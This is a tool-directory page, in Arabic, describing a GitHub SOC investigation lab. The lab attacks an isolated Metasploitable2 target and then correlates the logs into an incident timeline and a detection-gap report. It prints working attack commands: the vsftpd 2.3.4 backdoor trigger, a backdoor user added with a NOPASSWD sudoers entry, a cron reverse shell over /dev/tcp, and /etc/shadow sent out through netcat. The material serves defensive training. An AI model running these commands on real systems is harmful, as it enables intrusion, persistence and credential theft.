Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
soc-investigation-lab — تحقيق شامل في SOC: سلسلة هجوم CVE-2011-2523، ربط السجلات متعددة المصادر، تقرير الحادثة — MITRE ATT&CK T1190 | Kitploit
أدوات/GitHubGitHub/mithileshan/soc-investigation-lab
الاستطلاعتحليل الثغرات الأمنيةالاستغلالالتحقيق الجنائي الرقميما بعد الاستغلالاختبار الاختراقاستخبارات التهديداتالتعلم والتعليمالاستجابة للحوادث

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
تحليل السجلات
مختبرات وتدريب عملي
GitHubmithileshan/soc-investigation-lab

soc-investigation-lab

تحقيق شامل في SOC: سلسلة هجوم CVE-2011-2523، ربط السجلات متعددة المصادر، تقرير الحادثة — MITRE ATT&CK T1190

عرض المستودع
3منذ 4 أشهرلم تتم المراجعة بعد

مختبر تحقيقات SOC متكامل

ينفّذ سلسلة هجوم كاملة من أربع مراحل (استطلاع ← استغلال ← ثبات ← تسريب بيانات) ضد Metasploitable2، ويجمع الأدلة في كل مرحلة، وينتج خطًا زمنيًا منظمًا للحادث وتقرير SOC — مما يُظهر التفكير المتزامن للمهاجم والمدافع.

MITRE ATT&CK T1190 MITRE ATT&CK T1136 MITRE ATT&CK T1078 MITRE ATT&CK T1041 Python


الهدف

هذا هو المشروع الختامي. يبيّن القدرة على:

  • تنفيذ سلسلة قتل واقعية ضد هدف معرّض للاختراق عن قصد
  • جمع أدلة جنائية في كل مرحلة باستخدام مصادر تيليمتري متعددة
  • ربط إدخالات السجلات من أنظمة متباينة في خط زمني موحد للحادث
  • إجراء تحليل فجوة الرؤية — لتحديد ما كان سيُفوَّت دون تغطية كشف مناسبة
  • إنتاج تقرير حادث بمستوى SOC بالتنسيق المستخدم من فرق الأمن الحقيقية

الاستغلال المستخدم (CVE-2011-2523 — الباب الخلفي في vsftpd 2.3.4) ذو أهمية تاريخية: فقد كان هجومًا على سلسلة التوريد حيث حقن خصم بابًا خلفيًا في مستودع المصدر المفتوح لحزمة vsftpd.


البنية المعمارية

root@kitploit:~
                    ╔═══════════════════════════════╗
                    ║  soc-lab (172.23.0.0/24)       ║
                    ║                               ║
┌─────────────┐     ║  ┌─────────────────────────┐  ║
│  Attacker   │     ║  │  Metasploitable2        │  ║
│  Kali Linux │     ║  │  172.23.0.200           │  ║
│             │     ║  │                         │  ║
│  Phase 1    │─────╫─►│  :21  vsftpd 2.3.4 ◄───╫──╫── CVE-2011-2523
│  nmap -A    │     ║  │  :22  SSH               │  ║    backdoor on :6200
│             │     ║  │  :80  HTTP (DVWA)        │  ║
│  Phase 2    │─────╫─►│  :445 Samba             │  ║
│  msf exploit│◄────╫──│  :6200 root shell       │  ║
│             │     ║  └─────────────────────────┘  ║
│  Phase 3    │─────╫─► useradd sysbackup           ║
│  persistence│─────╫─► crontab reverse shell       ║
│             │     ║                               ║
│  Phase 4    │◄────╫── /etc/shadow via nc :5555    ║
│  exfiltration     ╚═══════════════════════════════╝
└──────┬──────┘
       │
       │ Evidence collection:
       │  logs/msf_session.log
       │  logs/target_auth.log
       │  captures/full_attack_chain.pcap (tshark CSV)
       ▼
┌──────────────────────────────────────────────────┐
│  build_timeline.py                               │
│  Parser: MSF log + auth.log + tshark CSV         │
│  → merge by timestamp → tag by phase             │
│  → JSON timeline + Markdown incident report      │
└──────────────────────────────────────────────────┘

الأدوات والتقنيات


الإعداد

root@kitploit:~
cd docker/

# Start Metasploitable2 (isolated network)
docker compose up -d metasploitable

# Verify target is reachable
nmap -p 21,22,80 172.23.0.200

# Start background packet capture
sudo tcpdump -i eth0 host 172.23.0.200 \
    -w captures/full_attack_chain.pcap &

طريقة التشغيل (سلسلة الهجوم)

المرحلة 1 — الاستطلاع

root@kitploit:~
nmap -sV -O -A \
    -p 21,22,80,139,445,3306,5432 \
    --script=banner,ftp-anon,http-title \
    -oX logs/recon_scan.xml \
    172.23.0.200

النتيجة الرئيسية: 21/tcp open ftp vsftpd 2.3.4

المرحلة 2 — الاستغلال (CVE-2011-2523)

root@kitploit:~
# Method A: Metasploit
msfconsole -q -x "
  use exploit/unix/ftp/vsftpd_234_backdoor;
  set RHOSTS 172.23.0.200;
  set PAYLOAD cmd/unix/interact;
  run" | tee logs/msf_session.log

# Method B: Manual (demonstrates the mechanism)
# Step 1: Trigger backdoor by sending username with ':)'
printf "USER evil:)\r\nPASS x\r\n" | nc 172.23.0.200 21
# Step 2: Connect to spawned root shell
nc 172.23.0.200 6200
# → id: uid=0(root) gid=0(root)

لماذا يعمل هذا: عندما يتلقى vsftpd 2.3.4 اسم مستخدم يحتوي على السلسلة الفرعية :)، ينفّذ البرنامج الخفي execl("/bin/sh",...) مربوطًا بمنفذ TCP 6200. لا حاجة للمصادقة — غلاف جذر مباشر.

المرحلة 3 — الثبات

root@kitploit:~
# Execute in the root shell on target:
useradd -m -s /bin/bash sysbackup
echo "sysbackup:$(openssl passwd -1 secr3t)" >> /etc/passwd
echo "sysbackup ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
(crontab -l 2>/dev/null; echo "* * * * * bash -i >& /dev/tcp/172.23.0.1/9999 0>&1") | crontab -

المرحلة 4 — تسريب البيانات

root@kitploit:~
# Receiver (attacker)
nc -lvnp 5555 > samples/exfiltrated_shadow.txt

# Sender (on target)
cat /etc/shadow | nc 172.23.0.1 5555

بناء الخط الزمني للحادث

root@kitploit:~
# Convert PCAP to CSV first
bash ../02-network-recon-detection/src/pcap_to_siem.sh captures/full_attack_chain.pcap

# Build timeline from all sources
python3 src/build_timeline.py \
    --msf-log  logs/msf_session.log \
    --auth-log logs/target_auth.log \
    --pcap-csv captures/full_attack_chain_packets.csv \
    --output-json samples/timeline.json \
    --output-md   docs/incident_report.md \
    --pretty

نموذج الإخراج

مخرجات build_timeline.py على stderr

root@kitploit:~
2026-04-24T16:05:20  [INFO    ]  Parsed 9 events from MSF log
2026-04-24T16:05:20  [INFO    ]  Parsed 11 events from auth.log
2026-04-24T16:05:20  [INFO    ]  Parsed 4 flow-initiation events from PCAP CSV
2026-04-24T16:05:20  [INFO    ]  Total events (sorted): 24
2026-04-24T16:05:20  [INFO    ]  Unique IOCs extracted: 4
2026-04-24T16:05:20  [INFO    ]  Phase RECON   : 8 event(s)
2026-04-24T16:05:20  [INFO    ]  Phase EXPLOIT : 4 event(s)
2026-04-24T16:05:20  [INFO    ]  Phase PERSIST : 6 event(s)
2026-04-24T16:05:20  [INFO    ]  Phase EXFIL   : 2 event(s)

الخط الزمني للحادث (مقتطف من samples/sample_timeline.json)

root@kitploit:~
{
  "total_events": 24,
  "iocs": [
    { "indicator": "172.23.0.1", "phase": "RECON",   "occurrence": 8 },
    { "indicator": "172.23.0.1", "phase": "EXPLOIT",  "occurrence": 2 },
    { "indicator": "sysbackup",  "phase": "PERSIST", "occurrence": 1 }
  ],
  "timeline": [
    { "timestamp": "2026-04-24T14:10:05+00:00", "phase": "RECON",   "description": "nmap -sV -O -A", "source": "metasploit" },
    { "timestamp": "2026-04-24T14:22:41+00:00", "phase": "EXPLOIT", "description": "session 1 opened (172.23.0.1 → 172.23.0.200)", "source": "metasploit" },
    { "timestamp": "2026-04-24T14:28:07+00:00", "phase": "PERSIST", "description": "useradd: new user: name=sysbackup", "source": "auth_log" },
    { "timestamp": "2026-04-24T14:35:52+00:00", "phase": "EXFIL",   "description": "flow 172.23.0.200 → 172.23.0.1:5555", "source": "pcap" }
  ]
}

تحليل فجوة الرؤية

هذا هو أهم مخرج تحليلي — ما كان سيُفوَّت دون كشف مناسب.

النتيجة الحرجة: لا يترك استغلال vsftpd 2.3.4 أي إدخال في auth.log لأنه يتجاوز نظام تسجيل الدخول. الدليل الوحيد في السجلات هو اتصال TCP اللاحق بالمنفذ 6200 — غير مرئي دون تيليمتري الشبكة. لا يمكن لسجلات نقاط النهاية وحدها اكتشاف هذه الفئة من الهجمات.


القيود والعمل المستقبلي


المراجع


هيكل المشروع

root@kitploit:~
04-soc-investigation/
├── src/
│   ├── build_timeline.py      # Multi-source log merger + phase tagger
│   └── run_attack_chain.sh    # Step-by-step attack chain with exact commands
├── configs/
│   └── splunk_detection_rules.spl   # Phase-specific SPL queries (RECON/EXPLOIT/PERSIST/EXFIL)
├── samples/
│   └── sample_timeline.json   # Example incident timeline JSON
├── docker/
│   └── docker-compose.yml     # Metasploitable2 isolated target
├── docs/
│   └── incident_report.md     # Generated SOC report (build_timeline.py --output-md)
└── screenshots/
تنزيل الأداة
الأداةالغرض
Metasploitable2هدف لينكس معرّض للاختراق عن قصد
Nmap 7.94المرحلة 1: تعداد الخدمات
Metasploit 6.xالمرحلة 2: استغلال vsftpd 2.3.4
Netcatالمرحلتان 3–4: الثبات وتسريب البيانات
tsharkالتقاط الحزم خلال جميع المراحل
Python 3build_timeline.py — دمج السجلات من مصادر متعددة
Splunk Free / ELKكشف SIEM خاص بكل مرحلة
المرحلةأدلة السجلات الخامما يلتقطه قاعدة SIEMما يُفوَّت دون تغطية
الاستطلاعPCAP: فيضان SYN إلى 24 منفذًاقاعدة مسح المنافذ (>20 منفذًا/10 ثوانٍ) ✓الفحص البطيء (-T1): يتجاوز حد المعدل تمامًا
الاستغلالPCAP: اتصال جديد بالمنفذ :6200 · لا يوجد إدخال في auth.logقاعدة الشذوذ للمنفذ :6200 ✓إذا استخدم المهاجم استغلال HTTP على :80 — لا شذوذ في المنافذ
الثباتauth.log: new user: name=sysbackupتنبيه إنشاء مستخدم جديد ✓تعديل /etc/passwd مباشرةً: صفر تسجيل بدون auditd
تسريب البياناتPCAP: 4 كيلوبايت صادرة على المنفذ :5555قاعدة المنفذ غير القياسي + الحجم ✓تسريب عبر DNS (سجلات TXT): يتجاوز قواعد الحجم تمامًا
القيدالتأثيرالتخفيف
ثغرة vsftpd 2.3.4 تعود لعام 2011لا تمثل الاستغلالات الحديثةإضافة EternalBlue (MS17-010) كسيناريو استغلال بديل
build_timeline.py يستخدم تصنيفًا بالكلمات المفتاحيةيخطئ في تصنيف بعض الأحداثتدريب مصنّف NLP خفيف على بيانات سجلات مصنّفة
لا يوجد كشف لنقاط النهاية (EDR)لا يُلتقط ثبات على مستوى الملفات (authorized_keys)إضافة Wazuh أو Elastic Agent على الهدف
تنفيذ يدوي لسلسلة الهجومغير قابل للتكرار دون تدخل تفاعليأتمتة المراحل 2–4 باستخدام نصوص موارد Metasploit
المرجعالمعرّف / الرابط
CVE-2011-2523 — الباب الخلفي في vsftpd 2.3.4https://nvd.nist.gov/vuln/detail/CVE-2011-2523
MITRE ATT&CK — استغلال تطبيق مواجه للعامةT1190
MITRE ATT&CK — إنشاء حساب: حساب محليT1136.001
MITRE ATT&CK — مهمة/وظيفة مجدولة: CronT1053.003
MITRE ATT&CK — تسريب البيانات عبر قناة C2T1041
MITRE ATT&CK — حسابات صالحةT1078